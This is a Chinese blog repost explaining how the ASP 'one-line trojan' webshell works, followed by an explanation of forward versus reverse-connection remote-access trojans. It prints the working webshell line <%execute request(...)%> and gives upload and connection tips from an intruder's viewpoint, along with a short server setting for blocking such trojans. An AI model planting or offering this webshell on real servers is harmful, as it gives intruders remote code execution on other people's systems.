asp一句话木马原理
生活随笔
收集整理的這篇文章主要介紹了
asp一句话木马原理
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
一句話木馬入侵原理
<%execute request(“#”)%>是典型的一句話木馬服務端代碼,將這個代碼寫入asp文件,就成了一句話木馬服務端文件。?仔細觀察一下<%execute request(“#”)%>這句代碼,括號里的“#”是我們一句話的密碼,我們可以把它改成任意字符,這樣可以避免別人發現我們的一句話木馬后,輕松的通過它撿個大便宜,如果我們上傳的一句話代碼為<%execute request(“123456″)%>。那么在客戶端連接文件里要將textarea name=”#”將其改為對應的textarea name=“123456”,才能連接成功。?
一句話木馬工作的原理:?
將一句話木馬插入到asp文件中(包括asa.cdx.cer文件),該語句將會作為觸發,接收入侵者通過客戶端提交的數據,執行并完成相應的入侵操作。?
客戶端則用來向服務端提交控制數據,提交的數據通過服務端構成完整的asp功能語句并執行,也就是生成我們所需要的asp木馬文件。?
一句話木馬能連接成功有兩個前提條件:?
一、服務器端沒有禁止Adodb.Stream組件,因為我們使用一句話木馬寫入WebShell代碼的條件是服務器端創建Adodb.Stream組件,如果該組件被禁用的話無法寫入。?
二、權限問題,如果當前的虛擬目錄禁止user組或者everyone寫入,同樣不會成功。 ?
如何啟用“一句話”木馬攔截功能?
(1)在服務器 wzxStopKeyWord.ini 文件中,設置 blockmuma = 1 表示啟用此功能,攔sb截“一句話”木馬。
(2)重啟IIS即可生效。
?????? 正向連接木馬,所謂正向,就是在中馬者在機器上開個端口,而我們去連接他的端口。而我們要知道他的IP,才能夠連接他。123就是他機器上開的端口 由于到現在,寬帶上網(動態IP)和路由器的普遍,這個軟件就有很大的不足 動態IP:每次撥號,IP都會跟換.所以,就算對方中了木馬,在下次撥號的時候,我們會因為找不到IP而丟肉雞 路由器:就是多個電腦同用1條寬帶(網吧上網就是最好的例子)他們通過路由器連接到寬帶,例如:主機的IP為225.124.3.41,而內網(就是用路由器的機器)的IP為192.168.X.X。在內網環境下,我們外界是無法訪問的,就是機器中了木馬也沒用。下面大家看下我的示意圖。簡單來說,內網的機器是比較安全的,外界是無法訪問的,就是我們連接不了內網器。而連接內網的機器,除非在同區域網里(在網吧A機,就能用RIDMIN連接網吧的B機). 簡單總結:在不同區域網下,正向木馬只能連接到外網的機器,而不能連接到內網的機器由于一系列的不足,就產生了反彈連接木馬,例如出門的國產軟件:灰鴿子
?????? 反彈連接木馬,就是在我們機器上開啟一個端口,讓中馬者來連接我們,從而獲得肉雞的信息,就算對方的IP怎么改變,也是無際于事。如果我們自己機器上的IP改變了,肉雞就無法找到我們的機器,從而無法獲得肉雞的信息,不過這點是不成問題的,WWW興起,就有了域名。在網絡中通過的對域名的訪問能找到自己對應的IP地址,例如[url]www.baidu.com[/url]的IP地址為22.181.38.4 如果百度的IP變成12.11.22.3的話,只要域名不改變,就算IP地址怎么變,它也能找到你。就算是內網的機器,我們也能獲得他的信息。
總結到底:本地開啟1個端口,肉雞連接上我們,就算是內外網的機器也可以 反彈連接木馬最頭疼的地方就是使用者是內網狀態的(大家可以看我的路線圖,藍色為反彈連接,黑色為正常連接)。說到為什么最頭疼,大家就回憶下正向連接木馬的原理。別人是無法直接訪問路由器內的機器(內網)。
總結
以上是生活随笔為你收集整理的asp一句话木马原理的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 复现《Region Filling an
- 下一篇: windows10应用商店打不开